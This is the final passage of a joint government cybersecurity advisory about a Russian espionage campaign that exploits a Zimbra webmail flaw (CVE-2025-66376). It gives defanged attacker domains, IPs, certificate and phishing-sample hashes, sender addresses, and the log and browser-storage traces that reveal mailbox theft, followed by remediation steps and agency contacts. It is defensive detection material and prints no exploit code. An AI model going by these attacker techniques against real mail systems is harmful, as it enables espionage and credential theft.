</ul>
<p>Additionally, for organizations that can inspect the content of outbound HTTPS connections via break-and-inspect infrastructure, security teams should identify traffic matching the characteristics described in the <a href="https://www.cisa.gov/#exfil1">Exfiltration</a> section of this advisory.</p>
<h3><em><strong>Indicators of compromise (IOCs)</strong></em><a class="ck-anchor"></a></h3>
<h4><strong>Flowerbed infrastructure</strong></h4>
<p>The following indicators have been attributed to use by LAUNDRY BEAR for their campaign targeting ZCS’s webmail service as of the publication of this advisory. (<strong>Disclaimer: </strong>Due to the frequency of operational structure changes by this group, these indicators are intended solely for historic attribution purposes. Some indicators, such as IPs, compromised emails, and domains, may be outdated, so organizations should check for current activity before acting on these IOCs.) <a href="https://www.cisa.gov/#table7"><strong>Table 7</strong></a> provides details about the server infrastructure used to host Flowerbed, and <a href="https://www.cisa.gov/#table8"><strong>Table 8</strong></a> lists the corresponding SHA-1 hash values for the Let’s Encrypt certificates used by that infrastructure [<a href="https://d3fend.mitre.org/technique/d3f:IdentifierActivityAnalysis" target="_blank">D3-IAA</a>].</p>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 7: Flowerbed server infrastructure</strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Domain </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>IP Address </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]104 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>8 July 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>15 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]18 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 August 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>14 October 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>37.120.247[.]228 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>185.86.79[.]95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>24 September 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>104.248.134[.]194 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>11 November 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>17 February 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>64.226.124[.]190 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 December 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>193.238.152[.]66 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>20 January 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>18 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>216.252.238[.]64 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>3 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>194.156.103[.]193 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>5 February 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW193774983 BCX8">
<div class="OutlineElement Ltr SCXW193774983 BCX8">
<p>30 March 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p><a class="ck-anchor"></a></p>
<table dir="ltr" class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<caption><em><strong>Table 8: Flowerbed X.509 certificate SHA-1 hashes  </strong></em></caption>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Associated Domain </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>X.509 SHA-1 Hash </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>First Seen </strong></p>
</div>
</div>
</th>
<th role="columnheader">
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p><strong>Last Seen </strong></p>
</div>
</div>
</th>
</tr>
</thead>
<tbody>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>2e4f314bc9943cab5005d6fde0b271c74d47bc9d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Jul 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zmailanalytics[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>50a87d926621dd06389ba50d86e0ff574ed713a8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>6 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>13 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbra-metadata[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>c5a72420e7bb308d078e62128430897f82194c95 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>20 Aug 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>14 Oct 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.analyticemailmeter[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8959c4d29e29f02ea94ea8bb21c8df2594c5549d </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>24 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>8 Nov 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.emailanalytics.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>62eb76432597694edb01c1fe57aab0cfe03a7178 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>25 Sep 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>27 Sep 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.mailnalysis[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>cddf5c3be1e07f28140aed165b929bf2d614922a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Nov 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>17 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrastat[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18b3ad442ce73cc8656d51d75bbd7c855f2cb7e8 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>18 Dec 2025 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>28 Dec 2025 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.zimbrasoft.com[.]ua </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>1b25041ececf2457eef0270fc1d785cec8ec9ded </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>21 Jan 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>10 Feb 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.synacorzimbra[.]nl </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>e4fe6466a4f9a4249fe330651e914e45bbdca44a </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>5 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>22 Mar 2026 </p>
</div>
</div>
</td>
</tr>
<tr>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>*.i.istc-cloud[.]com </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>b6b77c9a455225d525834a403ca9ef5481ed0447 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>12 Feb 2026 </p>
</div>
</div>
</td>
<td>
<div class="TableCellContent SCXW66173475 BCX8">
<div class="OutlineElement Ltr SCXW66173475 BCX8">
<p>30 Mar 2026 </p>
</div>
</div>
</td>
</tr>
</tbody>
</table>
<p>LAUNDRY BEAR has used the following email addresses to procure resources used for this campaign:</p>
<ul>
<li>ivanka.zurabishvili@proton[.]me,</li>
<li>zmul1@buildandconsulting[.]com,</li>
<li>garrysmithme@pinmx[.]net, and</li>
<li>hostingclient@pinmx[.]net.</li>
</ul>
<h4><strong>Phishing distribution</strong></h4>
<p>LAUNDRY BEAR primarily relied on ProtonMail for distribution of malicious email. However, as stated above, LAUNDRY BEAR’s more recent efforts likely have shifted to distributing the payload through previous victims.  </p>
<p>The following email addresses have distributed payloads attributed to this campaign:</p>
<ul>
<li>c.laurent.ejfa@proton[.]me,</li>
<li>j.moreau.epsc@proton[.]me,</li>
<li>liberty.insights@proton[.]me,</li>
<li>certain email addresses (presumably compromised) at the isofts.kiev[.]ua domain (i.e., ending with @isofts.kiev[.]ua), and</li>
<li>certain email addresses (presumably compromised) at the navs.edu[.]ua domain (i.e., ending with @navs.edu[.]ua).</li>
</ul>
<p>Additionally, the following are SHA-256 hashes of email samples containing the malicious payload attributed to this campaign:</p>
<ul>
<li>98df604ecc57f884a2e6ce3266a0013ad64455cac48442c2312cfa4765007aaf,</li>
<li>60db9abae75cd8ccc49dd7ea5feb41677566dcd442f12ebc5745ffd2810fb874,</li>
<li>b1f5beb1175fc5c7d1806a2f0d900eb124c54f0286c5c52b66eea7a6633adb1d, and</li>
<li>1517b3caa495f6c4e832df9c75fc94667e3c233773f7fa4e056d5e30e5ead760.</li>
</ul>
<h4><strong>Post-compromise artifacts</strong></h4>
<p>Currently, the script does not remove artifacts. This leaves additional opportunities to identify victims of this activity. While emphasis should always be placed on consistent monitoring of network traffic and endpoint activity, there are a variety of persistent artifacts described below that can be used to identify victims of this campaign.</p>
<p>This <em>Ulej </em>capability relies on creating a significant number of SOAP requests to collect account information for exfiltration. ZCS logs from these requests are stored, by default, in the <em>/opt/zimbra/log/mailbox.log</em> file [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. A significant amount of SOAP request activity that aligns with what was described in the <a href="https://www.cisa.gov/#persistence1">Persistence and credential access</a> and <a href="https://www.cisa.gov/#collection1">Collection</a> sections of this advisory could indicate a potential compromise. Specific examples of high-risk SOAP request activity might include:</p>
<ul>
<li>Many <em>SearchGalRequest </em>command requests from a single user over a short period of time;</li>
<li>Use of the <em>CreateAppSpecificPasswordRequest</em> command, especially in cases where it is creating an Application Passcode named “ZimbraWeb”; and</li>
<li>Use of the GetScratchCodesRequest command.</li>
</ul>
<p>While LAUNDRY BEAR uses the localStorage property to track what days had emails previously exfiltrated, defenders can use this property to identify victims of this campaign and determine the scope of exfiltrated information [<a href="https://d3fend.mitre.org/technique/d3f:ProcessAnalysis" target="_blank">D3-PA</a>]. Review of the items stored in that property for an organization’s ZCS webmail client page on an endpoint device could indicate compromise if there are items named with a format of <em>zd_comp_YYYY-MM-DD,</em> as explained in the <a href="https://www.cisa.gov/#collection1">Collection</a> section of this advisory.</p>
<p>While Application Passcodes have non-malicious purposes, in this case instances of these passcodes with the name “ZimbraWeb” are almost certainly malicious. The ZCS webmail application can support 2FA natively and does not require the use of an Application Passcode, so there is no reason that there should be one named “ZimbraWeb.”</p>
<p>In instances where organizations identify victims of this campaign, they should also examine the inbox of the suspected victim for the original phishing email [<a href="https://d3fend.mitre.org/technique/d3f:MessageAnalysis" target="_blank">D3-MA</a>]. If an email that has a payload exploiting <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376">CVE-2025-66376</a> is discovered, <strong>steps should be taken immediately to identify and quarantine other instances of emails with similar body content, senders, and subject lines to prevent further exploitation and exfiltration.  </strong></p>
<h3><em><strong>Remediation</strong></em></h3>
<p>In the event an organization identifies activity associated with this campaign, that organization should take steps to minimize further exploitation. The organization should consider requesting that employees minimize use of the ZCS webmail client until the organization updates to a patched version that is not vulnerable to <a href="https://www.cve.org/CVERecord?id=CVE-2025-66376" target="_blank">CVE-2025-66376</a>.</p>
<p>Organizations should use identifiers from the <a href="https://www.cisa.gov/#ioc1">IOCs</a> section of this report to identify any individuals compromised by this campaign and record the date(s) of compromise(s) to determine the scale and scope of emails exfiltrated.</p>
<p>All users from the organization should have all Application Passcodes and 2FA scratch keys revoked. Affected organizations should require all employees to change passwords in line with establishing minimum password strength requirements [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#EstablishMinimumPasswordStrength3B">CPG 3.B</a>] and creating unique credentials [<a href="https://www.cisa.gov/cybersecurity-performance-goals-2-0-cpg-2-0#CreateUniqueCredentials3C">CPG 3.C</a>], specifically noting that compromised employees might have had any password stored in a password manager exfiltrated.</p>
<h2><strong>Works cited</strong></h2>
<p>[1<a class="ck-anchor"></a>] Netherlands General Intelligence and Security Service (AIVD) and Netherlands Defence Intelligence and Security Service (MIVD). AIVD and MIVD identify a new Russian cyber threat actor. 2025. <a href="https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf" target="_blank">https://www.aivd.nl/site/binaries/site-content/collections/documents/2025/05/27/aivd-en-mivd-onderkennen-nieuwe-russische-cyberactor/Advisory+AIVD+en+MIVD+Public+report+on+new+cyber+actor.pdf</a></p>
<p>[2]<a class="ck-anchor"></a> Microsoft Corporation. New Russia-affiliated actor Void Blizzard targets critical sectors for espionage. 2025. <a href="https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/" target="_blank">https://www.microsoft.com/en-us/security/blog/2025/05/27/new-russia-affiliated-actor-void-blizzard-targets-critical-sectors-for-espionage/</a></p>
<p>[3]<a class="ck-anchor"></a> Palo Alto Networks Unit 42. Russian Global Webmail Espionage. 2026. <a href="https://unit42.paloaltonetworks.com/russian-webmail-espionage/">https://unit42.paloaltonetworks.com/russian-webmail-espionage/ </a></p>
<p>[4]<a class="ck-anchor"></a> Proofpoint. TA488 Targets Zimbra Mailservers with Half-Click Exploits. 2026. <a href="https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit">https://www.proofpoint.com/us/blog/threat-insight/ta488-zcs-exploit</a></p>
<p>[5]<a class="ck-anchor"></a> Seqrite. Operation GhostMail: Russian APT exploits Zimbra Webmail to Target Ukraine State Agency. 2026. <a href="https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/" target="_blank">https://www.seqrite.com/blog/operation-ghostmail-zimbra-xss-russian-apt-ukraine/  </a></p>
<h2><strong>Footnotes</strong></h2>
<p><sup>1</sup><a class="ck-anchor"></a> Národní úřad pro kybernetickou a informační bezpečnost<br><sup>2</sup><a class="ck-anchor"></a><sup> </sup>Forsvarets Efterretningstjeneste<br><sup>3</sup><a class="ck-anchor"></a><sup> </sup>Välisluureamet<br><sup>4</sup><a class="ck-anchor"></a> Sotilastiedustelu<br><sup>5</sup><a class="ck-anchor"></a><sup> </sup> Suojelupoliisi<br><sup>6</sup><a class="ck-anchor"></a> Direction générale de la sécurité intérieure<br><sup>7</sup><a class="ck-anchor"></a> Agence nationale de la sécurité des systèmes d’information<br><sup>8</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Esterna<br><sup>9</sup><a class="ck-anchor"></a> Agenzia Informazioni e Sicurezza Interna<br><sup>10</sup><a class="ck-anchor"></a> Serviciul de Informații și Securitate al Republicii Moldova<br><sup>11 </sup><a class="ck-anchor"></a>Agencja Wywiadu<br><sup>12</sup><a class="ck-anchor"></a><sup> </sup>Służba Kontrwywiadu Wojskowego<br><sup>13</sup><a class="ck-anchor"></a><sup> </sup>Centro Nacional de Inteligencia<br><sup>14 </sup><a class="ck-anchor"></a>Nationellt Cybersäkerhetscenter<br><sup>15</sup><a class="ck-anchor"></a> MITRE and ATT&amp;CK are registered trademarks of The MITRE Corporation. MITRE D3FEND is a trademark of The MITRE Corporation.</p>
<h2><strong>Acknowledgements</strong></h2>
<p>The authoring agencies acknowledge the contributions to this advisory from Palo Alto Networks Unit 42 and Proofpoint.</p>
<h2><strong>Disclaimer of endorsement</strong></h2>
<p>The information and opinions contained in this document are provided "as is" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.</p>
<p>Organizations have no obligation to respond or provide information back to the authoring organizations in response to this joint advisory. If, after reviewing the information provided, an organization decides to provide information to the authoring organizations, reporting must be consistent with all applicable laws and policies.</p>
<h2><strong>Purpose</strong></h2>
<p>This document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their responsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders.</p>
<h2><strong>Contact</strong></h2>
<div class="SCXW95230887 BCX8">
<div class="OutlineElement Ltr SCXW95230887 BCX8">
<p><strong>United States organizations </strong></p>
<ul>
<li><strong>National Security Agency</strong> <br>Cybersecurity Report Feedback: <a href="mailto:CybersecurityReports@nsa.gov" target="_blank"><u>CybersecurityReports@nsa.gov</u></a> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DIB_Defense@cyber.nsa.gov" target="_blank"><u>DIB_Defense@cyber.nsa.gov</u></a> <br>Media Inquiries / Press Desk: NSA Media Relations: 443-634-0721, <a href="mailto:MediaRelations@nsa.gov" target="_blank"><u>MediaRelations@nsa.gov</u></a> </li>
<li><strong>Cybersecurity and Infrastructure Security Agency</strong> <br>CISA’s 24/7 Operations Center (<a href="mailto:contact@cisa.dhs.gov" target="_blank"><u>contact@cisa.dhs.gov</u></a>), or by calling 1-844-Say-CISA (1-844-729-2472). </li>
<li><strong>Federal Bureau of Investigation</strong> <br>If you or someone you know has fallen victim to this campaign, file a complaint with <a class="Hyperlink SCXW95230887 BCX8" href="https://www.ic3.gov/" target="_blank" rel="noreferrer noopener"><u>IC3</u></a>. </li>
<li><strong>Defense Counterintelligence and Security Agency </strong> <br>DCSA Counterintelligence, Cyber Mission Center, Cyber Threat Operations Branch: <a href="mailto:DCSA.CI.CyberOps@mail.mil" target="_blank"><u>DCSA.CI.CyberOps@mail.mil</u></a> <br>Cleared Contactors (CCs) should contact their DCSA Counterintelligence Special Agent to report information pertaining to suspicious contacts or physical/digital efforts to obtain illegal or unauthorized access to the CC’s cleared facility/information, as required by 32 CFR 117. <br>Media/Public Inquiries: <a href="mailto:dcsa.quantico.dcsa-hq.mbx.pa@mail.mil" target="_blank"><u>dcsa.quantico.dcsa-hq.mbx.pa@mail.mil</u></a>  </li>
<li><strong>Department of Defense Cyber Crime Center </strong> <br>Defense Industrial Base Inquiries and Cybersecurity Services: <a href="mailto:DC3.DCISE@us.af.mil" target="_blank"><u>DC3.DCISE@us.af.mil</u></a> <br>Defense Industrial Base mandatory cyber incident reporting as required by 10 U.S. Code Sections 391 and 393 and Defense Federal Acquisition Regulation Supplement (DFARS) 252.204-7012 is submitted at <a href="https://dibnet.dod.mil/" target="_blank"><u>https://dibnet.dod.mil</u></a> <br>Media Inquiries / Press Desk: <a href="mailto:DC3.Information@us.af.mil" target="_blank"><u>DC3.Information@us.af.mil</u></a> </li>
<li><strong>Naval Criminal Investigative Service</strong> <br>To report criminal activity impacting the United States Navy, go to <a href="http://www.ncis.navy.mil/" target="_blank"><u>www.ncis.navy.mil</u></a> and click “Submit a Tip”</li>
</ul>
<p><strong>Dutch organizations</strong> </p>
<ul>
<li>Defence Intelligence and Security Service (MIVD): <a href="https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid" target="_blank"><u>https://www.defensie.nl/onderwerpen/m/militaire-inlichtingen-en-veiligheid</u></a>  </li>
<li>General Intelligence and Security Service (AIVD): <a href="https://www.aivd.nl/" target="_blank"><u>https://www.aivd.nl</u></a> </li>
</ul>
<p><strong>Australian organizations </strong></p>
<ul>
<li>Australian Signals Directorate <br>Visit <a href="https://www.cyber.gov.au/about-us/about-asd-acsc/contact-us#no-back" target="_blank"><u>cyber.gov.au</u></a> or call 1300 292 371 (1300 CYBER 1) to report cybersecurity incidents and access alerts and advisories. </li>
</ul>
<p><strong>Canadian organizations </strong></p>
<ul>
<li>The Canadian Centre for Cyber Security (Cyber Centre), part of the Communications Security Establishment, encourages Canadian organizations to report cyber incidents and to strengthen the security of their networking devices.  <br>Report an incident or suspicious activity to the Cyber Centre by email at <a href="mailto:contact@cyber.gc.ca" target="_blank"><u>contact@cyber.gc.ca</u></a>, online via the reporting tool <a href="https://www.cyber.gc.ca/en/incident-management" target="_blank"><u>Report a cyber incident - Canadian Centre for Cyber Security</u></a> or by phone at 1-833-CYBER-88 (1-833-292-3788). </li>
</ul>
<p><strong>New Zealand organizations </strong></p>
<ul>
<li>New Zealand National Cyber Security Centre (NCSC-NZ): <a href="mailto:info@ncsc.govt.nz" target="_blank"><u>info@ncsc.govt.nz</u></a> </li>
</ul>
<p><strong>United Kingdom organizations </strong></p>
<ul>
